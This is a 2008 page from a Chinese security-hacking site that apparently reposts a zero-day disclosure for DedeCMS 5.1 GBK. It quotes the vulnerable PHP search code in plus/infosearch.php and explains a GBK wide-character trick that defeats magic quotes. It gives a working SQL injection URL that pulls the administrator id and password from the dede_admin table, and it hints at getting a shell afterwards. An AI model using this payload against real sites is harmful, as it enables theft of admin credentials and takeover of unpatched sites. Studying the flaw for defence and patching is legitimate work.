基地首页 | 基地文章 | 基地动画 | 基地软件 | 技术论坛 | 会员学院
 
 
热门搜索:安全 安全工具 网络安全 会员培训 安全动画 安全
攻防总结免费资源网赚文章网管技巧防火墙技术端口入侵Sniffer嗅探arp技术
DDOS攻防3389攻防灰鸽子文章逆向工程破解实例加密技术脱壳技术溢出漏洞
serv-u漏洞社会工程学渗透技术跨站技术提权技术
 您现在的位置: 新世纪网安基地 >> 文章 >> 业内新闻 >> 漏洞公告 >> 文章正文
dedecms gbk版0day
作者:admin    文章来源:转载    点击数:    更新时间:2008-11-9

一个月前看了看了dedecms代码(只看了plus下的文件),发现有些变量人为控制没有过滤,但是在php的魔法引号这道天然屏障面前利用几率不好

但是联想到gbk的宽字符,突破方法就有了



漏洞文件:plus/infosearch.php

测试版本:5.1 gbk

描述:$q变量没有过滤直接进入查询,导致注入出现。代码如下:



PHP代码

$q = trim($q);    
if($areaid > 0) {    
 $wheresql = "areaid=$areaid and ";    
}    
   
$query = "select ID,typeid,title,memberID,writer,senddate from #@__infos where $wheresql title like '%$q%' order by senddate desc";    
   
   
$dlist = new DataList();    
   
   
$dlist->pageSize = 20;    
$dlist->SetParameter("q",$q);    
$dlist->SetParameter("action",'search');    
$dlist->SetParameter("areaid",$areaid);    
$dlist->SetSource($query);    



“‘”突破了,那就照常注入。

测试站:


http://www.xxx.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,id,4,pwd,6%20from%20dede_admin/*


至于后台拿shell,找不到后台的一样可以轻松拿到shell.不会的留言。

还有几个文件存在注入问题,象feedback.php,后续发放分析。

『关闭该页』 『打印该页』

  • 上一篇文章:
  • 责任编辑:Wangtianxiang 
  • 下一篇文章: 没有了
  • 最近更新
    推荐文章ms08067利用方法傻瓜化
    推荐文章让你彩虹QQ显示你的IP
    推荐文章不让自己显示在彩虹QQ
    推荐文章盗版Windows XP系统避
    推荐文章DOS命令综合学习版
    推荐文章不怕服务器被入侵---搞
    推荐文章黑客攻防:网页挂马攻
    推荐文章ADSL搭配无线路由器组
    推荐文章HTML七种加密解密
    推荐文章实例讲解:管理员常用D
    热门文章
    推荐文章ms08067利用方法傻瓜化
    普通文章教你ms08-067溢出的超
    普通文章Ms08-067 Exp 详细测试
    推荐文章让你彩虹QQ显示你的IP
    普通文章微软MS08-067远程控制
    普通文章Ms08-067 Exp 详细测试
    普通文章共享宽带的免费管理员
    普通文章10个常用菜鸟必学DOS命
    推荐文章不让自己显示在彩虹QQ
    普通文章知道手机号码如何查到
    相关文章
    如何用好Windows系统安全
    如何零投资开网店的绝招
    想赚钱的个人网站站长要
    押宝Windows7 微软砸下4
    linux提权用的技巧
    避免QQ聊天时受到攻击
    检查电脑是否中病毒木马
    金山证实黑客利用微软MS
    弱壳追捕——PE-SHiELD、
    黑客破解G1手机 可上Sym
    了解Cisco路由的基本配置
    经验分享:用流量赚钱的
    嗅探中当机的一点点启示
    微软“黑屏”最大后遗症
    反围剿,快速扫清系统中
    100%成功取回被盗的QQ号
    巧破ADSL账号被盗案
    看到一个思路新颖的下载
    脱壳后软件减肥大法
    将入侵者关在门外
    关于我们 | 加入会员 | 网安商城 | 投稿方法 | 广告报价| 友情连接 | 网站地图 | 网安论坛网安招聘
    加入会员咨询QQ:65444425 投稿方法: 广告与合作QQ:9324223

    浙ICP备06031184号